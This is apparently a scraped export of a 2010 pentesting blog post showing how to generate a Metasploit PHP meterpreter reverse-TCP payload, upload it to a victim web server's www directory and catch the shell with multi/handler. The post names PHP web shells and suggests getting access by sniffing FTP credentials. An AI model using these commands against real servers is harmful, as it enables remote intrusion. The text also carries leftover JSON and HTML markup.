Today I’ll be showing a new feature that has just been added to the Metasploit framework.<\/p>\n
http:\/\/blog.metasploit.com\/2010\/06\/meterpreter-for-pwned-home-pages.html<\/a><\/p>\n When one can upload files to a www directory and want further leverage on the system, they may want to do this via PHP in some way. PHP shells are a viable solution for this problem, if certain parameters are met.<\/p>\n One parameter that must be met, is that the server must allow system commands through PHP. If the server permits system commands through PHP, then a PHP shell will be a great tool for further assessment and possible privilege escalation.<\/p>\n If you surf around on the internet looking for PHP shells, you’ll find ones such as: c99.php, DXshell.php. Honestly, check out: php-shell.org <\/a><\/p>\n Now as part of the Metasploit framework, pentesters can now use meterpreter as a php payload. I will run through a quick example of how to create a meterpreter php payload and how to execute it:<\/p>\n With this file you can use it on the web server to get a reverse connection. Hopefully, you have gained some sort of write access to the www directory on the victim’s website. (For example, if you were to sniff \/ capture ftp credentials to the victim’s website). Other scenarios for gaining access to the system, may include local or remote file inclusion.<\/p>\n On the attacker’s end all you have to do is setup msfconsole and use the multi\/handler. The following commands should be issued:<\/p>\n msf >use multi\/handler All the attacker needs to do now, is simply visit to page http:\/\/victim.com\/mypayload.php and ideally the attacker should be able to get a meterpreter session.<\/p>\n More to come as usual…<\/p>\n","protected":false},"excerpt":{"rendered":" Today I’ll be showing a new feature that has just been added to the Metasploit framework. http:\/\/blog.metasploit.com\/2010\/06\/meterpreter-for-pwned-home-pages.html When one can upload files to a www directory and want further leverage on the system, they may want to do this via PHP in some way. PHP shells are a viable solution for this problem, if certain … Continue reading PHP meterpreter payload<\/span> msfpayload php\/meterpreter\/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R > mypayload.php<\/pre>\n
\nmsf >set PAYLOAD php\/meterpreter\/reverse_tcp
\nmsf >set LHOST 127.0.0.1
\nmsf >set LPORT 4444
\nmsf >exploit -z -j<\/p>\n